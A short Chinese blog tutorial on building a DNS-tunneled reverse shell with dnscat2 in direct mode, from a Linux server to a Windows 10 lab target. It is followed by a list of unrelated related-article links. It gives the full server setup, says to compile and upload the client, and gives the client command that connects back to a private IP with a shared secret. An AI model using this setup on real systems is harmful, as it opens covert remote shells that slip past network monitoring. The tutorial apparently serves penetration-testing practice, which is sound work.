使用dnscat2 进行dns隧道反弹shell——直连模式linux对windows

  • 直连模式:客户端直接向指定IP地址的DNS服务器发起DNS解析请求

环境搭建

搭建服务端

git clone https://github.com/iagox86/dnscat2.git

cd dnscat2/server/

gem install bundler

apt-get install ruby-dev

bundle install

过程会有点慢

开启服务端

ruby ./dnscat2.rb

搭建客户端

这里首先需要在Visual Studio 2008中打开一个解决方案:client\win32\dnscat2.vcproj。然后编译就会看到client\win32\Release下有一个dnscat2.exe文件了

将这个文件上传至win10靶机运行

开启客户端

dnscat2.exe --dns server=192.168.227.128,port=53 --secret=9d42a40bfeef7cf1f781326684d4d3e0

剩下的就和linux一样,进入隧道反弹shell,然后ctrl+z返回上一层

进入弹回来的shell

相关推荐
志栋智能1 小时前
告别报告堆砌:超自动化巡检的智能分析与洞察
运维·服务器·网络·人工智能·自动化
xyy_4961 小时前
wsl-localhost
linux
linux修理工2 小时前
linux禁用root登录
linux
雅斯驰2 小时前
AES-128加密+滚动码认证:ATA5702W如何防御中继攻击与信号重放
运维·单片机·嵌入式硬件·物联网·自动化
大方子3 小时前
【PolarCTF】PHP反序列化初试
网络安全·polarctf
网络与设备以及操作系统学习使用者3 小时前
直连路由优先级最高
运维·网络·学习·华为·智能路由器
goyeer3 小时前
【ITIL4】34服务实践 - 发布管理
运维·企业数字化·信息化·it管理·itil·it治理
小王C语言3 小时前
xshell免密登录
linux·运维·服务器
请输入蚊子3 小时前
《操作系统真象还原》 第十一章 用户进程
linux·操作系统·操作系统真像还原
AxureMost4 小时前
XnConvert v1.111.0 图像格式转换调整
windows